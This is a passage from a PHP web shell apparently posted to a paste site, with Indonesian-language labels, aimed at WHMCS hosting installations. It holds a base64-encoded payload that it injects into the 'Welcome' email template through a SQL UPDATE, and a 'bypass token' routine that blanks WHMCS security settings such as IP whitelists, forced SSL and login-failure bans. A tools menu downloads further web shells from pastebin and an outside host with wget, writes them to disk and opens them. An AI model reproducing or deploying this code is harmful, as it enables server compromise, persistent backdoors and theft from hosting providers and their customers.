  1518. name=shell>{php}eval(base64_decode('JGMwZGUgID0gYmFzZTY0X2RlY29kZSgnUjBsR09EbGhVRHM4Y0NCaGJHbG5iajBpWTJWdWRHVnlJajROQ2cwS1BEOXdhSEFOQ21WeWNtOXlYM0psY0c5eWRHbHVaeWd3S1RzTkNpUnpZM0pwY0hSdVlXMWxJRDBnSkY5VFJWSldSVkpiSjFORFVrbFFWRjlPUVUxRkoxMDdEUW9rWm1sc1pXNWhiV1VnUFNBa1gxQlBVMVJiSW1acGJHVnVZVzFsSWwwN0RRcHBaaWdrWDFCUFUxUmJJbk4xWW0xcGRDSmRJRDA5SUNKUGNHVnVJaWtOQ25zTkNtbG1LR1pwYkdWZlpYaHBjM1J6S0NSbWFXeGxibUZ0WlNrcERRcDdEUW9rWm1sc1pXTnZiblJsYm5SeklEMGdhSFJ0YkdWdWRHbDBhV1Z6S0dacGJHVmZaMlYwWDJOdmJuUmxiblJ6S0NSbWFXeGxibUZ0WlNrcE93MEthV1lvSVNSbWFXeGxZMjl1ZEdWdWRITXBEUW9rYzNSaGRIVnpJRDBnSWp4bWIyNTBJR1poWTJVOUoxWmxjbVJoYm1FbklITjBlV3hsUFNkbWIyNTBMWE5wZW1VNklEaHdkQ2MrUlhKeWIzSWdUbTkwYUdsdVp5QkdhV3hsUEM5bWIyNTBQaUk3RFFwOURRcGxiSE5sRFFva2MzUmhkSFZ6SUQwZ0lqeG1iMjUwSUdaaFkyVTlKMVpsY21SaGJtRW5JSE4wZVd4bFBTZG1iMjUwTFhOcGVtVTZJRGh3ZENjK1JtbHNaU0JrYjJWeklHNXZkQ0JsZUdsemRDRThMMlp2Ym5RK0lqc05DbjBKQ1EwS1pXeHpaU0JwWmlna1gxQlBVMVJiSW5OMVltMXBkQ0pkSUQwOUlDSkVaV3hsZEdVaUtRMEtldzBLYVdZb1ptbHNaVjlsZUdsemRITW9KR1pwYkdWdVlXMWxLU2tOQ25zTkNtbG1LSFZ1YkdsdWF5Z2tabWxzWlc1aGJXVXBLUWtOQ2lSemRHRjBkWE1nUFNBaVBHWnZiblFnWm1GalpUMG5WbVZ5WkdGdVlTY2djM1I1YkdVOUoyWnZiblF0YzJsNlpUb2dPSEIwSno1R2FXeGxJSE4xWTJObGMzTm1kV3hzZVNCa1pXeGxkR1ZrSVR3dlptOXVkRDRpT3cwS1pXeHpaUTBLSkhOMFlYUjFjeUE5SUNJOFptOXVkQ0JtWVdObFBTZFdaWEprWVc1aEp5QnpkSGxzWlQwblptOXVkQzF6YVhwbE9pQTRjSFFuUGtOdmRXeGtJRzV2ZENCa1pXeGxkR1VnWm1sc1pTRThMMlp2Ym5RK0lqc05DbjBOQ21Wc2MyVU5DaVJ6ZEdGMGRYTWdQU0FpUEdadmJuUWdabUZqWlQwblZtVnlaR0Z1WVNjZ2MzUjViR1U5SjJadmJuUXRjMmw2WlRvZ09IQjBKejVHYVd4bElHUnZaWE1nYm05MElHVjRhWE4wSVR3dlptOXVkRDRpT3cwS2ZRMEtaV3h6WlNCcFppZ2tYMUJQVTFSYkluTjFZbTFwZENKZElEMDlJQ0pUWVhabElpa05DbnNOQ2lSbWFXeGxZMjl1ZEdWdWRITWdQU0J6ZEhKcGNITnNZWE5vWlhNb2FIUnRiRjlsYm5ScGRIbGZaR1ZqYjJSbEtDUmZVRTlUVkZzaVkyOXVkR1Z1ZEhNaVhTa3BPdzBLYVdZb1ptbHNaVjlsZUdsemRITW9KR1pwYkdWdVlXMWxLU2tOQ25WdWJHbHVheWdrWm1sc1pXNWhiV1VwT3cwS0pHaGhibVJzWlNBOUlHWnZjR1Z1S0NSbWFXeGxibUZ0WlN3Z0luY2lLVHNOQ21sbUtDRWthR0Z1Wkd4bEtRMEtKSE4wWVhSMWN5QTlJQ0k4Wm05dWRDQm1ZV05sUFNkV1pYSmtZVzVoSnlCemRIbHNaVDBuWm05dWRDMXphWHBsT2lBNGNIUW5Qa052ZFd4a0lHNXZkQ0J2Y0dWdUlHWnBiR1VnWm05eUlIZHlhWFJsSUdGalkyVnpjeUVnUEM5bWIyNTBQaUk3RFFwbGJITmxEUXA3RFFwcFppZ2habmR5YVhSbEtDUm9ZVzVrYkdVc0lDUm1hV3hsWTI5dWRHVnVkSE1wS1EwS0pITjBZWFIxY3lBOUlDUnpkR0YwZFhNdUlqeG1iMjUwSUdaaFkyVTlKMVpsY21SaGJtRW5JSE4wZVd4bFBTZG1iMjUwTFhOcGVtVTZJRGh3ZENjK1EyOTFiR1FnYm05MElIZHlhWFJsSUhSdklHWnBiR1VoSUNoTllYbGlaU0I1YjNVZ1pHbGtiaWQwSUdWdWRHVnlJR0Z1ZVNCMFpYaDBQeWs4TDJadmJuUStJanNOQ21aamJHOXpaU2drYUdGdVpHeGxLVHNOQ24wTkNpUm1hV3hsWTI5dWRHVnVkSE1nUFNCb2RHMXNaVzUwYVhScFpYTW9KR1pwYkdWamIyNTBaVzUwY3lrN0RRcDlEUXBsYkhObERRcDdEUW9rYzNSaGRIVnpJRDBnSWp4bWIyNTBJR1poWTJVOUoxWmxjbVJoYm1FbklITjBlV3hsUFNkbWIyNTBMWE5wZW1VNklEaHdkQ2MrVG04Z1ptbHNaU0JzYjJGa1pXUWhQQzltYjI1MFBpSTdEUXA5RFFvL1BnMEtQSFJoWW14bElHSnZjbVJsY2owaU1DSWdZV3hwWjI0OUltTmxiblJsY2lJK1BIUnlQangwWkQ0OGRHRmliR1VnZDJsa2RHZzlJakV3TUNVaUlHSnZjbVJsY2owaU1DSStQSFJ5UGp4MFpENE5DanhtYjNKdElHMWxkR2h2WkQwaWNHOXpkQ0lnWVdOMGFXOXVQU0k4UDBWamFHOGdKSE5qY21sd2RHNWhiV1U3UHo0aVBnMEtQR2x1Y0hWMElITjBlV3hsUFNKamIyeHZjanBzYVcxbE8ySmhZMnRuY205MWJtUXRZMjlzYjNJNkl6QXdNREF3TUNJZ2JtRnRaVDBpWm1sc1pXNWhiV1VpSUhSNWNHVTlJblJsZUhRaUlIWmhiSFZsUFNJOFAwVmphRzhnSkdacGJHVnVZVzFsT3o4K0lpQnphWHBsUFNJM01pSStEUW84YVc1d2RYUWdkSGx3WlQwaWMzVmliV2wwSWlCemRIbHNaVDBpWTI5c2IzSTZiR2x0WlR0aVlXTnJaM0p2ZFc1a0xXTnZiRzl5T2lNd01EQXdNREFpSUc1aGJXVTlJbk4xWW0xcGRDSWdkbUZzZFdVOUlrOXdaVzRpUGcwS1BHbHVjSFYwSUhSNWNHVTlJbk4xWW0xcGRDSWdjM1I1YkdVOUltTnZiRzl5T214cGJXVTdZbUZqYTJkeWIzVnVaQzFqYjJ4dmNqb2pNREF3TURBd0lpQnVZVzFsUFNKemRXSnRhWFFpSUhaaGJIVmxQU0pFWld4bGRHVWlQand2ZEdRK1BDOTBjajQ4TDNSaFlteGxQZzBLUEdadmJuUWdabUZqWlQwaVZtVnlaR0Z1WVNJZ2MzUjViR1U5SW1admJuUXRjMmw2WlRvZ01URndkQ0krRFFvOGRHVjRkR0Z5WldFZ2JtRnRaVDBpWTI5dWRHVnVkSE1pSUhOMGVXeGxQU0pqYjJ4dmNqcHNhVzFsTzJKaFkydG5jbTkxYm1RdFkyOXNiM0k2SXpBd01EQXdNQ0lnWTI5c2N6MGlOekFpSUhKdmQzTTlJakkxSWo0TkNqdy9SV05vYnlBa1ptbHNaV052Ym5SbGJuUnpPejgrUEM5MFpYaDBZWEpsWVQ0OEwyWnZiblErUEdKeVBnMEtQR2x1Y0hWMElIUjVjR1U5SW5OMVltMXBkQ0lnYzNSNWJHVTlJbU52Ykc5eU9teHBiV1U3WW1GamEyZHliM1Z1WkMxamIyeHZjam9qTURBd01EQXdJaUJ1WVcxbFBTSnpkV0p0YVhRaUlIWmhiSFZsUFNKVFlYWmxJajROQ2p4cGJuQjFkQ0IwZVhCbFBTSnlaWE5sZENJZ2MzUjViR1U5SW1OdmJHOXlPbXhwYldVN1ltRmphMmR5YjNWdVpDMWpiMnh2Y2pvak1EQXdNREF3SWlCMllXeDFaVDBpVW1WelpYUWlQZzBLUEM5bWIzSnRQZzBLUEhBK0RRbzhhRE0rWDFWUVRFOUJSQ0JHU1V4Rlh6eG9NejROQ2cwS1BEOXdhSEFOQ2cwS1pXTm9ieUFuUEdadmNtMGdZV04wYVc5dVBTSWlJRzFsZEdodlpEMGljRzl6ZENJZ1pXNWpkSGx3WlQwaWJYVnNkR2x3WVhKMEwyWnZjbTB0WkdGMFlTSWdibUZ0WlQwaWRYQnNiMkZrWlhJaUlHbGtQU0oxY0d4dllXUmxjaUkrSnpzTkNnMEtaV05vYnlBblVFRlVTQ0JVUVZKSFJWUWdPaUE4YVc1d2RYUWdibUZ0WlQwaWRYQnNiMkZrZEc4aUlITjBlV3hsUFNKamIyeHZjanBzYVcxbE8ySmhZMnRuY205MWJtUXRZMjlzYjNJNkl6QXdNREF3TUNJZ2RIbHdaVDBpZEdWNGRDSWdjMmw2WlQwaU5UQWlJSFpoYkhWbFBTSW5MbWRsZEdOM1pDZ3BMaWNpUGp4aWNpQXZQaWM3RFFwbFkyaHZJQ2M4YVc1d2RYUWdkSGx3WlQwaVptbHNaU0lnYzNSNWJHVTlJbU52Ykc5eU9teHBiV1U3WW1GamEyZHliM1Z1WkMxamIyeHZjam9qTURBd01EQXdJaUJ1WVcxbFBTSm1hV3hsSWlCemFYcGxQU0l6TUNJK1BHbHVjSFYwSUc1aGJXVTlJbDkxY0d3aUlITjBlV3hsUFNKamIyeHZjanBzYVcxbE8ySmhZMnRuY205MWJtUXRZMjlzYjNJNkl6QXdNREF3TUNJZ2RIbHdaVDBpYzNWaWJXbDBJaUJwWkQwaVgzVndiQ0lnZG1Gc2RXVTlJbFZ3Ykc5aFpDSStQQzltYjNKdFBpYzdEUXBwWmlnZ0pGOVFUMU5VV3lkZmRYQnNKMTBnUFQwZ0lsVndiRzloWkNJZ0tTQjdEUXBwWmloQVkyOXdlU2drWDBaSlRFVlRXeWRtYVd4bEoxMWJKM1J0Y0Y5dVlXMWxKMTBzSUNSZlVFOVRWRnNuZFhCc2IyRmtkRzhuWFM0bkx5Y3VKRjlHU1V4RlUxc25abWxzWlNkZFd5ZHVZVzFsSjEwcEtTQjdEUW9OQ21WamFHOGdKenhtYjI1MElHTnZiRzl5UFNKc2FXMWxJajViSzEwZ1ZYQnNiMkZrSUZOMWEzTmxjeUE2ZGlBOFluSXZQaUJiSzEwZ0p5NGtYMUJQVTFSYkozVndiRzloWkhSdkoxMHVJaThpTGlSZlJrbE1SVk5iSjJacGJHVW5YVnNuYm1GdFpTZGRPdzBLZlNCbGJITmxJSHNOQ21WamFHOGdKMXQrWFNCVmNHeHZZV1FnUm1GcGJHVmtJRlJmVkNCYmZsMDhMMlp2Ym5RK1BHSnlQaWM3RFFwOUlIME5DajgrRFFvPScpOw0KDQokZm9wZW4gPSBmb3BlbiAoJ2RtLnBocCcsJ3cnKTsNCiR3cml0ZSAgPSBmd3JpdGUoJGZvcGVuICwgJGMwZGUpOw=='));{/php}</textarea>
  1519. </td></tr>
  1520. <tr><td align="center" colspan="2"><input class=submit type="submit" style="color:#FF0000;background-color:#000000" value=" HAJAR BOS " name="plapon"></td></tr>
  1521. </table>
  1522. <br>
  1523. </form>
  1524. </center>
  1525. <?php
  1526. if(isset($_POST['plapon'])) {
  1527. $anu1 = $_POST['anu1'];
  1528. $anu2 = $_POST['anu2'];
  1529. $anu3 = $_POST['anu3'];
  1530. $anu4 = $_POST['anu4'];
  1531. @mysql_connect($anu1,$anu2,$anu3);
  1532. @mysql_select_db($anu4);
  1533. $shell=str_replace("'","'",$shell);
  1534. $gosok_shell = $_POST['shell'];
  1535. $colok = "UPDATE tblemailtemplates SET message ='".$gosok_shell."' WHERE subject ='Welcome'";
  1536. $udah_ganteng=@mysql_query($colok);if($udah_ganteng)
  1537. {
  1538. echo "<font color='lime'>SUKSES BOS  GANTENG :P</font>";
  1539. }
  1540. }
  1541. }
  1542.  
  1543.  
  1544.  
  1545. if($_GET['whmcs']=="token"){
  1546. set_time_limit(0);
  1547. ?>
  1548. <p><br/><body>
  1549. <center><img src="http://www.nextgenhost.net/icons/logo-cpanel-whm.png"> <br/><br/><nobr><b><span class="b7">O=:[ BYPASS </span> <span class="b8">TOKEN ]:=O</span></b></nobr><br/><br/>
  1550. <p><form method="post">
  1551. <table border=1>
  1552. <tr><td>db_host </td><td><input type="text" style="color:#FF0000;background-color:#000000" size="60" name="anu1" value="localhost"></td></tr>
  1553. <tr><td>db_username </td><td><input type="text" style="color:#FF0000;background-color:#000000" size="60" name="anu2"></td></tr>
  1554. <tr><td>db_password</td><td><input type="text" style="color:#FF0000;background-color:#000000" size="60" name="anu3"></td></tr>
  1555. <tr><td>db_name</td><td><input type="text" style="color:#FF0000;background-color:#000000" size="60" name="anu4"></td></tr>
  1556. <tr><td align="center" colspan="2"><input class=submit type="submit" style="color:#FF0000;background-color:#000000" value=" HAJAR BOS " name="plapon"></td></tr>
  1557. </table>
  1558. <br>
  1559. </FORM>
  1560. </center>
  1561. <?php
  1562. if(isset($_POST['plapon'])) {
  1563.  
  1564. $anu1 = $_POST['anu1'];
  1565. $anu2 = $_POST['anu2'];
  1566. $anu3 = $_POST['anu3'];
  1567. $anu4 = $_POST['anu4'];
  1568. @mysql_connect($anu1,$anu2,$anu3);
  1569. @mysql_select_db($anu4);
  1570.  
  1571. $crot1 = "UPDATE tblconfiguration SET value='' WHERE setting='InvalidLoginBanLength'";
  1572. $crot2 = "UPDATE tblconfiguration SET value='' WHERE setting='AdminForceSSL'";
  1573. $crot3 = "UPDATE tblconfiguration SET value='' WHERE setting='RequiredPWStrength'";
  1574. $crot4 = "UPDATE tblconfiguration SET value='' WHERE setting='MaintenanceMode'";
  1575. $crot5 = "UPDATE tblconfiguration SET value='' WHERE setting='APIAllowedIPs'";
  1576. $crot6 = "UPDATE tblconfiguration SET value='' WHERE setting='LoginFailures'";
  1577. $crot7 = "UPDATE tblconfiguration SET value='' WHERE setting='InstanceID'";
  1578. $crot8 = "UPDATE tblconfiguration SET value='' WHERE setting='WhitelistedIPs'";
  1579. $crot9 = "UPDATE tblconfiguration SET value='' WHERE setting='ToggleInfoPopup'";$crot10 = "UPDATE tblconfiguration SET value='' WHERE setting='token_namespaces'";
  1580.  
  1581. $udah_ganteng=@mysql_query($crot1);
  1582. $udah_ganteng=@mysql_query($crot2);
  1583. $udah_ganteng=@mysql_query($crot3);
  1584. $udah_ganteng=@mysql_query($crot4);
  1585. $udah_ganteng=@mysql_query($crot5);
  1586. $udah_ganteng=@mysql_query($crot6);
  1587. $udah_ganteng=@mysql_query($crot7);
  1588. $udah_ganteng=@mysql_query($crot8);
  1589. $udah_ganteng=@mysql_query($crot9);
  1590. $udah_ganteng=@mysql_query($crot10);
  1591.  
  1592. if($udah_ganteng)
  1593. {
  1594. echo "<font color='lime'>SUKSES BOS  GANTENG :P</font>";
  1595. }
  1596. }
  1597. }
  1598. if($_GET['auto']=="tools"){
  1599. echo"<div style='background:orange;margin:0px;padding:16px;text-align:center;color:silver;'><form method='POST'><b><i><input type='submit' name='tool1' value='PERLSHELL'> => This Perl Web Shell, And Default Password is (az404)<br><input type='submit' name='tool3' value='DMSHELL'> => This PHP Web Shell, And Default Password is (dm) <br><input type='submit' name='tool2' value='WPMASLOGIN'> => This PHP Wordpress Mass Change Login Info</i></b><br></form></div>";
  1600. if($_POST['tool1']){
  1601. $get = file_get_contents('http://pastebin.com/raw/5trLjPyh');
  1602. $bwt = fopen('cgi.pl', 'w');
  1603. fwrite($bwt,$get);
  1604. fclose($bwt);
  1605. chmod('cgi.pl',0755);
  1606. echo'<meta http-equiv="Refresh" content= "0; url=cgi.pl">';
  1607.  }
  1608.  if($_POST['tool2']){
  1609. system('wget www.wget.yu.tl/files/wp.zip'); system('mv wp.zip wp.php');
  1610. echo'<meta http-equiv="Refresh" content= "0; url=wp.php">';
  1611.  }
  1612.  if($_POST['tool3']){
  1613. system('wget www.wget.yu.tl/files/dm.zip'); system('mv dm.zip dm.php');
  1614. echo'<meta http-equiv="Refresh" content= "0; url=dm.php">';
  1615.  }
  1616.  
  1617.  }
  1618.  
  1619. echo'<br><br>
  1620. <div style="background:blue;margin:0px;padding:8px;text-align:center;color:black;">
  1621. <font color=silver>&copy; </font><b><i>AZZATSSINS CYBERSERKERS</i></b>
  1622. </div>';
  1623.  ?>
Add Comment
Please, Sign In to add comment